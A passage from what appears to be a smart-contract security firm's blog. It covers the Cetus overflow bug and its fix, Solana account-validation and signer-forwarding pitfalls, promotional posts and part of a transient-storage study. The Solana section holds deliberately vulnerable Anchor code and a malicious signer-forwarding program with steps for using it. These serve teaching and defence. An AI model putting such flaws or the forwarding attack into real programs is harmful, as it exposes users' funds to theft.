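    The intermediate product liquidity * sqrt_price_diff must therefore fit in 192 bits for the shift by 64 to be lossless in 256-bit arithmetic; this is exactly what checked_shlw is supposed to verify.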

    The Mathematical Breakdown

    Using the actual values from the transaction:

    • liquidity: 10,365,647,984,364,446,732,462,244,378,333,008 (approximately 2^113)
    • sqrt_price_0: 60,257,519,765,924,248,467,716,150 (tick 300000)
    • sqrt_price_1: 60,863,087,478,126,617,965,993,239 (tick 300200)
    • sqrt_price_diff: 605,567,712,202,369,498,277,089 (approximately 2^79)

    The critical calculation:

    numerator = checked_shlw(liquidity * sqrt_price_diff)
              = checked_shlw(~2^113 * ~2^79)
              = checked_shlw(2^192 + ε)
              // checked_shlw shifts a 256-bit register by 64
              = ((2^192 + ε) * 2^64) mod 2^256
              = ε
    
    

    This multiplication produces a result exceeding 192 bits. When this value is left-shifted by 64 bits in checked_shlw (i.e., “checked shift left by one 64-bit word”), it overflows a 256-bit integer, but the overflow check designed for exactly this case fails to detect it.

    But wait. Isn’t a checked operation supposed to prevent this issue?

    The Flawed Overflow Check

    The critical flaw lies in the checked_shlw function:

    public fun checked_shlw(n: u256): (u256, bool) {
        let mask = 0xffffffffffffffff << 192;  // This is incorrect!
        if (n > mask) {
            (0, true)
        } else {
            ((n << 64), false) // exact location of overflow
        }
    }

    The mask calculation 0xffffffffffffffff << 192 doesn’t produce the intended result: it equals 2^256 − 2^192, so the check n > mask only flags inputs whose top 64 bits are all set. The developers likely intended to check if n >= (1 << 192), but the actual mask doesn’t serve this purpose. As a result, most values greater than 2^192 pass through undetected, and the subsequent left shift by 64 bits causes a silent overflow in Move (which doesn’t trigger runtime errors for shift operations).
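
    A minimal sketch of what the check likely intended (our reconstruction, not Cetus’s actual patch): flag any input whose top 64 bits are non-zero before shifting.

    module examples::checked_shlw_fix {
        /// Shift left by 64 bits, reporting overflow instead of silently truncating.
        public fun checked_shlw(n: u256): (u256, bool) {
            // Any n at or above 2^192 would lose its top bits when shifted left by 64.
            if (n >= (1u256 << 192)) {
                (0, true)
            } else {
                ((n << 64), false)
            }
        }
    }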

    Integer Considerations

    In Move, the security around integer operations is designed to prevent overflow and underflow which can cause unexpected behavior or vulnerabilities. Specifically:

    • Additions (+) and multiplications (*) cause the program to abort if the result is too large for the integer type. An abort in this context means that the program will terminate immediately.
    • Subtractions (-) abort if the result is less than zero.
    • Division (/) aborts if the divisor is zero.
    • Left Shift (<<), uniquely, does not abort in the event of an overflow. This means if the shifted bits exceed the storage capacity of the integer type, the program will not terminate, resulting in incorrect values or unpredictable behavior.

      It is normal for languages with checked arithmetic to not trigger errors when bit shifting truncates the result. Most smart contract auditors understand this.
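
    A tiny illustration of the difference (our example; the values are chosen only to show the behavior):

    module examples::shift_semantics {
        public fun demo(): (u8, u8) {
            let a = 16u8;
            // `a * 16` would abort here with an arithmetic error (256 does not fit in u8)...
            // let product = a * 16;
            // ...but `a << 4` silently truncates to 0 and execution continues.
            let shifted = a << 4;
            (a, shifted) // returns (16, 0)
        }
    }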

    The Exploitation Impact

    Due to the overflow, the numerator wraps around to a very small value. When divided by the denominator, it produces a quotient close to 0. This means the function returns that only 1 unit of token A is required to mint the massive liquidity position.

    In mathematical terms:

    • Expected: a very large number of tokens required
    • Actual (due to overflow): 1 token required

    It is worth noting that the numeric values involved in the attack are precisely calculated – the attacker utilized some existing functions in the contract to compute these, notably get_liquidity_from_a.

    The Audit Trail: Similar Issue Found Before

    Ottersec’s audit identified an eerily similar overflow vulnerability in an earlier variant of the code (early 2023), specifically designed for Aptos:

    “The numberator value is not validated before running u256::shlw on it. As a result, the non-zero bytes might be removed, which leads to an incorrect calculation of the value.”

    They recommended replacing u256::shlw with u256::checked_shlw and adding overflow detection, which solved the issue. Note that this version of the code had custom implementations of 256-bit unsigned integer operations, since Aptos did not support them natively at the time. (Native support arrived with Move 2 / Aptos CLI ≈ v1.10, which rolled out to mainnet in early 2024.)

    It is really unfortunate that when the team ported the code to Sui a couple of months later (Sui has always supported 256-bit integers), a bug was introduced in checked_shlw. Audits of this version of the AMM by Ottersec and MoveBit did not find this issue. A subsequent audit by Zellic in April 2025 found no issues beyond informational findings. It is possible that library code performing numerical calculations was out of scope; moreover, since 256-bit operations are natively supported, issues like these could have been overlooked.

    Lessons for Developers

    1. Understand Your Language’s Integer Semantics

    • Know which operations abort and which silently overflow
    • Pay special attention to bit shift operations
    • Test your overflow checks with actual overflow conditions

    2. Mathematical Rigor is Non-Negotiable

    • DeFi protocols need to handle extreme values by design
    • The bounds of every mathematical operation need to be clearly understood
    • Consider using formal methods for verifying critical calculations (our team can assist)

    3. Test Edge Cases Exhaustively

    • Maximum values aren’t theoretical – they’re attack vectors
    • Combine multiple edge cases

    4. Audit Fixes, Not Just Changes

    • Consider independent verification of critical fixes

    5. Domain Expertise Matters

    • AMM mathematics involves complex invariants
    • Work with auditors who understand DeFi edge cases

    In DeFi, edge cases aren’t edge cases – they’re attack vectors. AMMs are particularly vulnerable as they involve complex mathematical operations across extreme ranges. The Cetus hack demonstrates that even “checked” operations require careful verification.

    Conclusion

    The Cetus hack serves as a stark reminder that security in DeFi is hard, but not impossible to achieve. A single flawed overflow check, combined with the composability of flash loans and concentrated liquidity mechanics, enabled the theft of over $200 million.

    For developers building on Move-based chains like Sui and Aptos, this incident underscores the importance of understanding your language’s integer semantics, rigorously testing edge cases, and working with auditors who deeply understand both the platform and the DeFi domain.

    Contact us at Dedaub if you need help securing your Aptos or Sui Network project – our team specializes in the mathematical complexities and edge cases that come up in complex DeFi protocols.

  • Dedaub Partners with Immunefi to Bring Native Firewall Capabilities to Magnus

    Dedaub Partners with Immunefi to Bring Native Firewall Capabilities to Magnus

    Dedaub has joined forces with Immunefi to develop an onchain firewall for the Magnus platform. This partnership brings together two leading teams in web3 security with a shared mission to improve smart contract resilience by building a system that can detect and block malicious transactions before they execute onchain.

    “We’re excited to work with Immunefi — a team we’ve long respected for their impact in the space. Together, we’re developing a runtime firewall within Magnus — the single pane of glass for onchain SecOps — to advance web3 security through real-time threat prevention.” — Neville Grech, Co-founder of Dedaub.

    Magnus: Your Onchain Security Command Center

    Immunefi Magnus offers a single interface for protocols to manage audits, bug bounties, monitoring, firewalling, and incident response. With Magnus, web3 security teams operate from an end-to-end platform that streamlines operations, avoids the pitfalls of siloed tools, and enables teams to layer on protection as needed.

    • One platform for audits, bounties, monitoring, firewalling, and more
    • Integrated, top-tier tools across every layer of defense
    • Supercharged CI/CD pipelines with built-in security at every stage
    • Automated threat detection and response with AI-powered workflows

    With Dedaub onboard, Magnus draws on our long-standing expertise in smart contract analysis, decompilation, and runtime monitoring.

    “We built Magnus to unify the fragmented world of Web3 security. Partnering with Dedaub allows us to bring even deeper threat prevention capabilities into that vision — enabling protocols to move from reactive defense to real-time protection.” — Mitchell Amador, CEO of Immunefi.

    To follow the progress of our collaboration with Immunefi and explore how we’re evolving security at the execution layer, sign up for Magnus early access here.

  • From Ethereum to Solana: How Developer Assumptions Can Introduce Critical Security Vulnerabilities

    From Ethereum to Solana: How Developer Assumptions Can Introduce Critical Security Vulnerabilities

     Ethereum Developers on Solana

    Solana stands out as one of the most popular blockchains, known for its high throughput and scalability that position it as an attractive alternative to Ethereum. These benefits arise from Solana’s distinctive architecture, which is markedly different from Ethereum’s design. While these architectural differences underlie many of Solana’s strengths, they also introduce unique risks that may be unfamiliar to developers transitioning from Ethereum. In this article, we will explore some common errors that Ethereum developers might make when building Solana programs, given the vastly different security models of the two platforms.

    Proper Account Validation

    State in Ethereum is tightly associated with the smart contract code that controls it. Each contract on Ethereum has a unique storage space that cannot be written to by any other contract. Solana takes a very different approach, separating executable code, called programs, from other types of accounts. This introduces an additional complexity, which can easily be overlooked by Ethereum developers: account validation.

    On Solana, users must provide all the accounts on which a program operates. This means that if the program does not enforce the appropriate constraints and validations, a malicious user may inject unexpected accounts, which could lead to critical vulnerabilities. Specifically, all accounts should be checked for correct ownership, correct type, correct address if a specific account is expected, and correct relations with other accounts expected by the program. All of these validations are made simpler using the Anchor framework. However, missed checks and validations are still possible even when leveraging these tools, especially when using remaining_accounts, on which Anchor imposes no checks. For example, consider the following snippet from a simple lending program:

    
    pub fn liquidate_collateral(ctx: Context<LiquidateCollateral>) -> Result<()> {
        let borrower = &mut ctx.accounts.borrower;
        let collateral = &mut ctx.accounts.collateral;
        let liquidator = &mut ctx.accounts.liquidator;
    
        let collateral_in_usd = get_value_in_usd(collateral.amount, collateral.mint);
        let borrowed_amount_in_usd = get_value_in_usd(borrower.borrowed_amount, borrower.mint);
    
        if collateral_in_usd * 100 < borrowed_amount_in_usd * 150 {
            withdraw_from(liquidator, borrower.borrowed_amount);
            transfer_collateral_to_liquidator(ctx);
            let liquidated_amount = collateral.amount;
    
            borrower.borrowed_amount = 0;
            msg!(
                "Liquidated {} collateral tokens due to insufficient collateralisation.",
                liquidated_amount
            );
        } else {
            msg!("Collateralisation ratio is sufficient; no liquidation performed.");
        }
        Ok(())
    }
    
    
    #[derive(Accounts)]
    pub struct LiquidateCollateral<'info> {
        #[account(mut)]
        pub borrower: Account<'info, BorrowerAccount>,
    
        #[account(mut)]
        pub collateral: Account<'info, TokenAccount>,
    
        #[account(mut)]
        pub liquidator: Account<'info, TokenAccount>,
    
        /// CHECK: signer PDA for collateral account
        pub collateral_signer: UncheckedAccount<'info>,
    
        pub token_program: Program<'info, Token>,
    }
    

    This function simply checks the collateralisation ratio of a loan and performs liquidation if the ratio is below 1.5. A similar program on Ethereum would likely store collateral data in a mapping, whether in the same contract or a different one. This would require the contract developer to explicitly specify a key for the mapping. However, on Solana, it is the user that chooses the account as opposed to the developer.

    Hence, while at first glance this may seem secure coming from Ethereum, the instruction handler is missing a crucial check. In-built Anchor checks ensure that all accounts are of the correct type and have the correct owner; however, there is no check ensuring that the collateral account provided is associated with the provided borrower. This means an attacker could provide an arbitrary borrower account together with the collateral account of a different borrower. This effectively allows the attacker to liquidate any collateral account, regardless of its collateralisation ratio, by finding (or creating) a borrower account that is just below the required ratio.
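
    One way to close the gap (a sketch, assuming BorrowerAccount records the pubkey of its collateral token account in a collateral field) is to tie the two accounts together with Anchor’s has_one constraint:

    use anchor_lang::prelude::*;
    use anchor_spl::token::TokenAccount;

    // Assumed shape of the borrower state for this sketch.
    #[account]
    pub struct BorrowerAccount {
        pub collateral: Pubkey,   // the collateral token account backing this loan
        pub mint: Pubkey,
        pub borrowed_amount: u64,
    }

    #[derive(Accounts)]
    pub struct LiquidateCollateral<'info> {
        // has_one enforces borrower.collateral == collateral.key(), so a
        // mismatched borrower/collateral pair is rejected before the handler runs.
        #[account(mut, has_one = collateral)]
        pub borrower: Account<'info, BorrowerAccount>,

        #[account(mut)]
        pub collateral: Account<'info, TokenAccount>,
    }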

    This example demonstrates the dangers of insufficient account validation, especially transitioning from Ethereum development, where such validations do not exist. While Ethereum’s model tightly couples state with the source code, limiting potential interference from external actors, Solana’s separation of executable programs and accounts demands that developers take extra precautions. On Solana, every account passed into a program must be meticulously checked for proper ownership, type, and expected relationships.

    Signer Account Forwarding

    On Ethereum, authorisation is quite straightforward. The global variable msg.sender can be used to securely determine the immediate caller to the function, which is often enough to authorise privileged actions. On Solana, a similar approach can be employed, leveraging signer accounts.

    Signer accounts in Solana serve as the entities that have provided a valid signature for a transaction, confirming their intent and authority to perform an action. These accounts can either be traditional user keypairs, where a private key directly authorises actions, or Program Derived Addresses (PDAs). PDAs are account addresses deterministically generated from a set of seeds and a program ID. Unlike keypairs, PDAs do not have a private key. Only the program from which the PDA is defined can mark a PDA as a signer account using the invoke_signed function.
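
    For reference, this is how a PDA is derived (a minimal sketch; the seed string is purely illustrative):

    use solana_program::pubkey::Pubkey;

    // Returns the derived address plus the bump that pushes it off the ed25519
    // curve, guaranteeing that no private key exists for it.
    fn derive_signer_pda(program_id: &Pubkey) -> (Pubkey, u8) {
        Pubkey::find_program_address(&[b"timelock_signer"], program_id)
    }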

    Unlike msg.sender, a signer account does not securely determine the immediate caller. Programs in Solana are allowed to invoke other programs with the same signer accounts they themselves were invoked with, effectively forwarding signer accounts.

    A Solana program can call other programs through CPI (Cross-Program Invocation). There are two ways to perform a CPI: invoke and invoke_signed. As mentioned earlier, invoke_signed is used to mark a PDA account (which must be derived from the calling program) as a signer for the CPI. The invoke function, on the other hand, does not add any signers. Both functions can forward accounts that are already marked as signers.

    Hence, when a user or program provides a signer account, they are essentially entrusting downstream programs with a piece of verified authority. The vulnerability emerges when this trust is misplaced. If an untrusted program is invoked with a signer account that possesses sensitive privileges, it can forward this signer with arbitrary arguments to exploit these privileges. For instance, an attacker might leverage this oversight to perform operations on behalf of an unsuspecting user.

    Programs are especially at risk when performing a signed CPI on a program that can be determined or influenced by the user. A malicious user may intentionally direct the CPI to a malicious program, effectively hijacking the signer account to impersonate the vulnerable program. The severity of the issue could be even further elevated if the CPI allows the user to specify remaining_accounts to increase the flexibility of the call. While this significantly increases the flexibility and composability of Solana programs for legitimate users, it also carries additional risks. An attacker exploiting insecure signature handling may be able to leverage these remaining_accounts to include any required additional accounts that are necessary to make a privileged call.

    Consider the below timelock program:

    /// Queue an arbitrary task with a specified delay.
    /// The caller provides the target program, instruction data (task_data), 
    /// and a delay (in seconds) that determines when the task can be executed.
    
    pub fn queue_task(
        ctx: Context<QueueTask>, 
        task_data: Vec<u8>, 
        target_program: Pubkey, 
        delay: i64
    ) -> ProgramResult {
    
        let task = &mut ctx.accounts.task;
    
        // Get the current unix timestamp
        let clock = Clock::get()?;
    
        task.release_time = clock.unix_timestamp + delay;  // set execution time to now + delay
        task.target_program = target_program; // target program to invoke on execute
        task.authority = *ctx.accounts.authority.key; // task creator stored for authorisation
    
        task.task_data = task_data; // arbitrary instruction data
    
        Ok(())
    }
    
    
    
    #[derive(Accounts)]
    pub struct QueueTask<'info> {
        #[account(
            init, 
            payer = authority, 
            space = 8 + Task::LEN,
        )]
    
        pub task: Account<'info, Task>,
    
        #[account(mut)]
        pub authority: Signer<'info>,
    
        pub system_program: Program<'info, System>,
    }

    This program allows anyone to queue a task with an arbitrary delay, storing the creator of the task for authorisation purposes. The program and arguments are controlled by the creator. Now consider this program’s execute function:

    /// Execute the queued task.
    /// Anyone can call this instruction, but the task will only execute if the timelock has expired.
    
    pub fn execute_task(ctx: Context<ExecuteTask>) -> ProgramResult {
        let task = &ctx.accounts.task;
    
        // Ensure the timelock has passed
        let clock = Clock::get()?;
        if clock.unix_timestamp < task.release_time {
            return Err(ErrorCode::TimelockNotExpired.into());
        }
    
        let cpi_accounts: Vec<AccountMeta> = std::iter::once(&ctx.accounts.task_authority)
            .chain(ctx.remaining_accounts.iter())
            .map(|acc| AccountMeta {
                pubkey: *acc.key,
                is_signer: acc.is_signer,
                is_writable: acc.is_writable,
            })
            .collect();
    
        let ix = Instruction {
            program_id: task.target_program,
            accounts: cpi_accounts,
            data: task.task_data.clone(),
        };
    
        invoke_signed(&ix, ctx.remaining_accounts, &[&[TIMELOCK_SIGNER]])?;
        Ok(())
    }
    
    #[derive(Accounts)]
    pub struct ExecuteTask<'info> {
        #[account(mut, close = authority)]
        pub task: Account<'info, Task>,
    
        /// CHECK: validated against the authority stored on the task account
        #[account(address = task.authority)]
        pub task_authority: AccountInfo<'info>,
    
        /// This is only needed to receive the lamports from the closing account.
        #[account(mut)]
        pub authority: Signer<'info>,
    
        /// CHECK: PDA used only as the shared CPI signer for all tasks
        #[account(
            seeds = [TIMELOCK_SIGNER],
            bump
        )]
        pub timelock_signer: UncheckedAccount<'info>,
    
        pub system_program: Program<'info, System>,
    }

    This execute function allows anyone to execute the task once the time has elapsed, with the original task creator being prepended to the accounts list for authorisation purposes. To an Ethereum developer, this may appear secure. However, under Solana’s security model, this program contains a critical error.

    The CPI in the execute_task function uses the same signer PDA for all tasks. This means a malicious task could misuse the signer to impersonate the timelock program. Suppose an attacker were to create the following program:

    #[program]
    pub mod malicious_program {
        use super::*;
        // This instruction strips away the task-creator account and forwards the
        // timelock's PDA signer via CPI to an arbitrary target program, which then
        // believes the timelock legitimately authorised the call.
        pub fn forward_signer(ctx: Context<ForwardSigner>) -> Result<()> {
            // Forward every remaining account unchanged; the timelock's PDA keeps
            // its is_signer flag, so its authority is carried through to the target.
            let accounts: Vec<AccountMeta> = ctx.remaining_accounts.iter()
                .map(|acc| AccountMeta { pubkey: *acc.key, is_signer: acc.is_signer, is_writable: acc.is_writable })
                .collect();
            let instruction_data: Vec<u8> = vec![]; // attacker-controlled data
            let instruction = Instruction {
                program_id: ctx.accounts.target_program.key(),
                accounts,
                data: instruction_data,
            };

            invoke(&instruction, ctx.remaining_accounts)?;
            Ok(())
        }
    }
    
    #[derive(Accounts)]
    pub struct ForwardSigner<'info> {
        /// CHECK: This is the attacker's key as they created the malicious task
        pub ignored_task_creator: UncheckedAccount<'info>,
        /// CHECK: This is the target program's ID
        pub target_program: UncheckedAccount<'info>,
    }
    

    This program is designed to receive a CPI from the timelock program, strip away the task-creator account that is intended for a vital security check, and redirect the call (timelock signature intact) to a different program. If an unsuspecting program exposes a privileged function to the timelock and uses the first account for authorisation, the attacker can exploit this: first queue a task with minimal delay pointing at the malicious program, then execute the task, supplying the real target program followed by the accounts required for the target invocation. The resulting CPI is indistinguishable from a legitimate CPI from the timelock, so the attacker can bypass the delay of any existing tasks and potentially execute functions they are not authorised to call.

    This example illustrates the dangers of misunderstanding Solana’s security model. In essence, mishandling signer accounts can transform a useful delegation mechanism into an exploitable backdoor, where an attacker could chain CPIs to bypass critical authorisation checks. The authority given to signer accounts should be carefully considered, and no single signer account should be used to authorise multiple actions.

    Ethereum Developers on Solana: Conclusion

    The transition from Ethereum to Solana requires certain security assumptions to be reconsidered. Inadequate account verification and unchecked signer account forwarding can open doors for exploitation. Developers must enforce strict ownership, type checks, relationship validations, and signer handling among accounts to mitigate risks. Embracing Solana’s distinct model calls for a careful and updated approach to program design, ensuring robust protection against vulnerabilities inherent in its architecture.


    Brought to you by Dedaub, the home of the best EVM bytecode decompiler.

  • Dedaub at ETHDenver 2025 | Showcasing Real-Time Security Monitoring

    Dedaub at ETHDenver 2025 | Showcasing Real-Time Security Monitoring

    Dedaub is excited to sponsor ETHDenver once again! This year, we will showcase the Dedaub Security Suite‘s real-time monitoring capabilities. Our team is eager to discuss the latest Web3 vulnerabilities, audit best practices, and develop partnerships at ETHDenver 2025.

    ETHDenver 2025 | Stop by Booth #513

    Located near the Main Entrance | You Won’t Miss Us!

    Visit us at Booth #513, just a few steps from the main entrance, where our team will gladly guide you through our advanced monitoring and alerting tools at ETHDenver 2025. Discover how they provide three lines of defense in a single monitoring solution to proactively identify rug pulls, anomalies, and protocol breaches before they escalate.

    1st Line: Continuous Static Code Analysis

    • Detect 0-days in newly deployed code
    • Novel theorem-proving techniques introduced to reduce false positives

    2nd Line: Custom Monitoring Agents using DedaubQL

    • Fully customizable & highly expressive language for developing agents
    • Detects anomalous conditions in your protocol

    3rd Line: Suspicious Contract & Transaction Detection

    • Predicts whether your project is targeted for attack
    • Detects suspicious transactions

    Post-Audit Protection: Why Continuous Monitoring is Essential

    For years, smart contract security has revolved around audits, bug bounty programs, and reactive responses to exploits. However, as DeFi and on-chain applications grow, post-deployment security is becoming increasingly critical. An audit is just the beginning—ongoing monitoring ensures that emerging threats are detected and addressed before they evolve into costly exploits. Join us at ETHDenver 2025 to learn more about this crucial process.

    Granular, Customizable Monitoring Agents on Demand 

    Dedaub’s monitoring system enables fully customizable agents by leveraging DedaubQL, a highly expressive and performant declarative language tailored for blockchain security monitoring. DedaubQL allows protocols to define and check invariants and adapt our threat detection algorithms to their particular logic and concerns.

    The execution model of DedaubQL ensures that monitoring agents operate continuously and with minimal delay, updating alerts in real-time as new blockchain data becomes available.

    By enabling protocols to construct custom agents that can detect anomalies specific to their architecture—such as liquidity imbalances, unexpected contract interactions, or unauthorized fund movements—Dedaub’s monitoring suite provides a fine-tuned, protocol-specific defense mechanism.

    About ETHDenver 2025

    ETHDenver 2025 will once again transform Denver into a global hotspot for blockchain innovation, continuing the momentum built in previous years. As a community-owned festival powered by SporkDAO, ETHDenver 2025 offers various activities— from workshops and technical talks to boot camps and networking parties—designed to spark creativity and collaboration.

  • Dedaub Security Suite Updates Q4-24

    Dedaub Security Suite Updates Q4-24

    FREE MONITORING for all!

    The Dedaub Security Suite continues to evolve with features designed to simplify blockchain transaction monitoring and security analysis. These new capabilities address Web3 challenges and empower developers, security professionals, and organizations to work more effectively. Here’s an overview of what’s new.


    Blockchain Transaction Monitoring Available to Free-Tier Users

    We are excited to offer all registered users free access to Blockchain Transaction Monitoring queries.

    With our free plan, users can set up monitoring bots or queries to track on-chain activities and trigger custom actions through webhooks. These tools allow users to flag unusual transactions or stay alert to specific on-chain events, helping them maintain vigilant oversight of their projects.

    (For the free tier of the application, there are limits on how many queries can run simultaneously or generate alerts.)

    Log in today and try it out.


    Multi-Chain Monitoring Agents

    Monitoring agents are now network-agnostic, meaning they can track activities across multiple blockchains, such as Ethereum and other EVM-compatible networks, making cross-chain transaction monitoring more efficient.

    For example, a DeFi project that runs on Ethereum and BNB Chain can now monitor high-value token transfers and detect suspicious behavior on both networks simultaneously. Updated macros make configuring these cross-chain queries easy, ensuring seamless and efficient monitoring.


    Public Function-Based Similarity

    Identifying patterns across contracts is now more straightforward. The Public Function-Based Similarity feature allows users to find contracts with similar functions to their target contract. This feature uses large language models (LLMs) to detect similarities.


    Enhanced Monitoring Editor

    The updated monitoring editor simplifies the query writing process, making it faster and more intuitive. The query language server now offers real-time suggestions, including table and macro names, helping users quickly identify the correct syntax and options for their monitoring requirements. Additionally, the revamped error reporting system accurately identifies issues in queries, such as undefined variables or incorrect filters, and provides actionable feedback to help users resolve these issues. This is especially useful for blockchain transaction monitoring queries.


    Monitoring Star Rating System

    The Monitoring Star Rating System within the Dedaub Security Suite allows users to quickly provide feedback on monitoring queries. Using this star rating system to share their experiences, users contribute to a valuable library of insights that assist others in finding the right tools to meet their needs. This approach ensures the platform stays focused on practical, real-world use cases.


    Blockchain Transaction Monitoring Folders for Organization

    The new monitoring folders feature allows users to organize queries systematically, ensuring better clarity and accessibility within the Dedaub Security Suite. By categorizing queries into dedicated folders, users can navigate their query library quickly and maintain a cleaner workspace.


    Advanced RPC Fetch Functions

    The latest Dedaub Security Suite introduces advanced monitoring capabilities that support external REST API requests. Five new functions allow users to incorporate data from external sources directly into their monitoring queries. The system supports HTTP GET, POST, and PUT requests.


    Results from the requests can be joined against results from other tables. 

    In total, there are 5 new functions:

    • http_get() for all GET requests
    • http_get_json() for GET requests that return json strings
    • http_get_json_array() for GET requests that return json arrays
    • http_post() for POST requests
    • http_put() for PUT requests

    Cross-Chain Contract Lists

    With the new cross-chain contract lists feature, users can manage contract data spanning multiple blockchain networks in one unified list. For instance, users can create a single list to monitor contracts deployed on Ethereum and other EVM-compatible networks. This helps streamline blockchain transaction monitoring across networks.


    Annotate and Share Transaction Traces

    Transaction traces now support annotations, making it easier to interpret complex data. Users can add custom highlights and aliases to addresses and share these annotated traces with their team for collaborative analysis.


    Blockchain Monitoring + contract lists = ♥️

    Users can now incorporate contract lists into their monitoring queries.


    Improved Gnosis Proxy Support

    We’ve added better support for Gnosis proxies to our Security Suite! You can now interact with the proxy using the underlying implementation ABI.


    Advanced Code View

    Play around with our new advanced code view in the decompiler and projects! The new code view allows multiple code representations to open concurrently in a split panel, with the ability to synchronize the two in some cases.


    Previous Security Suite Updates

  • Dedaub at DeFi Security Summit 2024

    Dedaub at DeFi Security Summit 2024

    DSS 2024 | Dedaub is sponsoring the DeFi Security Summit 2024 in Bangkok, Nov 7-9! 🎉 We're contributing to sessions on secure development and using LLMs for smart contract analysis. Follow @summit_defi for the latest updates.

    Dedaub is proud to sponsor the DeFi Security Summit (DSS) 2024, which will be held from November 7th to 9th in Bangkok. The summit aims to enhance the security of smart contracts in decentralized finance. This sponsorship reflects our commitment to bolstering Web3 by elevating blockchain security standards and promoting collaboration within the ecosystem.

    In the 2024 edition, we’re contributing to two key sessions:

    1. SEAL Panel: “Safer Development: Don’t Get Rekt”

    This panel will cover best practices for secure development, with insights from top security leaders. Gain practical strategies to avoid common pitfalls in smart contract development.

    2. “Smart Contracts to Embeddings: Using Off-the-Shelf LLMs for Fun and Profit”

    Dedaub will demonstrate how Large Language Models (LLMs) can improve smart contract analysis, providing developers with new tools to understand and enhance contract security.

    DSS 2024 | About DeFi Security Summit

    The DeFi Security Summit (DSS) is an annual, marketing-free event dedicated to advancing the security of decentralized finance (DeFi) applications and blockchain-based technology. Inspired by renowned security conferences like CCC and Defcon, DSS is a platform for white-hat hackers, protocol builders, security researchers, and tool providers to collaborate and share insights. The summit focuses on education, technical advancements, and best practices to secure blockchain applications’ on-chain and off-chain components. DSS 2024 will be the third edition, building on the success of previous years. For more info, visit https://defisecuritysummit.org/.

    About Dedaub 

    Dedaub is a pioneer in Smart Contract security technology and auditing. We blend cutting-edge program analysis with real-world white-hat hacking. As a founding collaborator of the SEAL 911 initiative, we contribute to emergency response frameworks within the blockchain ecosystem. Trusted by leading protocols, Dedaub is the security partner for Oasis Protocol Sapphire and collaborates with the Chainlink BUILD program. Our role on the ZKSync Security Council and as a security advisor to Arbitrum DAO emphasizes our commitment to safeguarding major Web3 projects.

  • Transient Storage in the wild: An impact study on EIP-1153

    Transient Storage in the wild: An impact study on EIP-1153

    With the recent introduction of transient storage in Ethereum, the landscape of state management within the Ethereum Virtual Machine (EVM) has evolved once again. This latest development has prompted us at Dedaub to take a fresh look at how data is stored and accessed in the EVM ecosystem, as well as analyze how the new transient storage is used in real-world applications.

    It’s important to note that even though transient storage has been properly integrated into the EVM, the transient modifier is not yet available in Solidity. Therefore, all usage of transient storage goes directly through the TSTORE and TLOAD opcodes using inline assembly, meaning usage is not yet widespread and could also carry a higher risk of vulnerability.

    📢 Update: as of 9 October 2024, with the release of solc 0.8.28, transient storage is supported directly in the language (for value-type state variables, via the transient keyword). This does not invalidate any of the content in this article, but please keep in mind that it was written at Ethereum block number 20129223.

    In this comprehensive blog post, we will explore the strengths and limitations of each storage type, discuss their appropriate use cases, and examine how the introduction of transient storage fits into the broader ecosystem of EVM data management. If you do not need a refresher on how the EVM manages state, feel free to skip to the EIP-1153 impact analysis section.

    EIP-1153 | Quick refresher of data storage and access

    Storage

    Storage in Ethereum refers to the persistent storage a contract holds. This storage is split into 32-byte slots, with each slot having its own address ranging from 0 to 2^256 - 1. In total, that means a contract could store potentially up to 2^261 bytes.

    Of course, the EVM doesn’t track all of those bytes simultaneously. Instead, storage is treated more like a map: when a specific storage slot needs to be used, it is loaded on demand, with the slot index acting as the key and the 32 bytes being stored or accessed acting as the value.
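
    To make this slot-addressed model concrete, here is a minimal sketch of our own (SlotDemo, rawWrite and rawRead are hypothetical names, not from any deployed contract) that reads and writes arbitrary slots directly with inline assembly:

    contract SlotDemo {
        uint256 public counter; // the compiler assigns this variable to slot 0
    
        // Write a 32-byte value at an arbitrary slot index.
        function rawWrite(uint256 slot, bytes32 value) external {
            assembly {
                sstore(slot, value)
            }
        }
    
        // Read the 32-byte value stored at an arbitrary slot index.
        function rawRead(uint256 slot) external view returns (bytes32 value) {
            assembly {
                value := sload(slot)
            }
        }
    }

    Calling rawRead(0) returns the current value of counter, illustrating that named state variables are just conventions layered on top of the slot map.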

    Starting from slot 0, Solidity will try to store statically-sized values as compactly as possible, only moving to the next slot when a value cannot fit into the remaining space. Structs and fixed-size arrays always start a new slot, and any items following them also start a new slot, but their own contents are still tightly packed.

    Here are the rules as stated by the Solidity docs:

    • The first item in a storage slot is stored lower-order aligned (i.e., it occupies the lowest-order bytes of the slot).
    • Value types use only as many bytes as are necessary to store them.
    • If a value type does not fit the remaining part of a storage slot, it will be stored in the next storage slot.
    • Structs and array data always start a new slot and their items are packed tightly according to these rules.
    • Items following struct or array data always start a new storage slot.

    However, for mappings and dynamically sized arrays, there is no guarantee on how much space they will take up, so they cannot be stored alongside the rest of the fixed-size values.

    For dynamic arrays, the slot they would have taken up instead stores the length of the array. The array data is then stored like a fixed-size array starting from slot keccak256(s), where s is the original slot the array would have taken up. Dynamic arrays of arrays recursively follow this pattern, meaning arr[0][0] would be located at keccak256(keccak256(s)), where s is the slot at which the original array is declared.

    For mappings, the slot itself remains empty and merely marks the mapping’s position. Every key-value pair is stored at keccak256(pad(key) . s), where s is the original declaration slot of the mapping, . is concatenation, and the key is padded to 32 bytes if it is a value type (but not if it is a string or byte array). This address stores the value for the corresponding key, following the same rules as other storage types.
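
    These two derivation rules can be written down directly in Solidity. The following sketch is ours (SlotMath is a hypothetical helper, not part of the original analysis), assuming a value-type mapping key and array elements that each occupy a full slot:

    library SlotMath {
        // Slot of map[key] for a mapping declared at slot `s` (value-type key,
        // left-padded to 32 bytes): keccak256(pad(key) . s)
        function mappingSlot(bytes32 key, uint256 s) internal pure returns (bytes32) {
            return keccak256(abi.encode(key, s));
        }
    
        // Slot of arr[i] for a dynamic array declared at slot `s`:
        // the data starts at keccak256(s) and element i lives i slots further on.
        function dynamicArraySlot(uint256 s, uint256 i) internal pure returns (bytes32) {
            return bytes32(uint256(keccak256(abi.encode(s))) + i);
        }
    }

    For instance, in the Storage contract below, mappingSlot(bytes32(uint256(uint160(user))), 5) gives the slot holding balances[user].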

    As an example, let’s look at a sample contract Storage.sol and view its storage:

    contract Storage {
        struct SomeData {
            uint128 x;
            uint128 y;
            bytes z;
        }
    
        bool[8] flags;
        uint160 time;
        
        string title;
        SomeData data;
        mapping(address => uint256) balances;
        mapping(address => SomeData) userDatas;
        
        // ...
    }
    
    | Name      | Type                                        | Slot | Offset | Bytes | Contract                |
    |-----------|---------------------------------------------|------|--------|-------|-------------------------|
    | flags     | bool[8]                                     | 0    | 0      | 32    | src/Storage.sol:Storage |
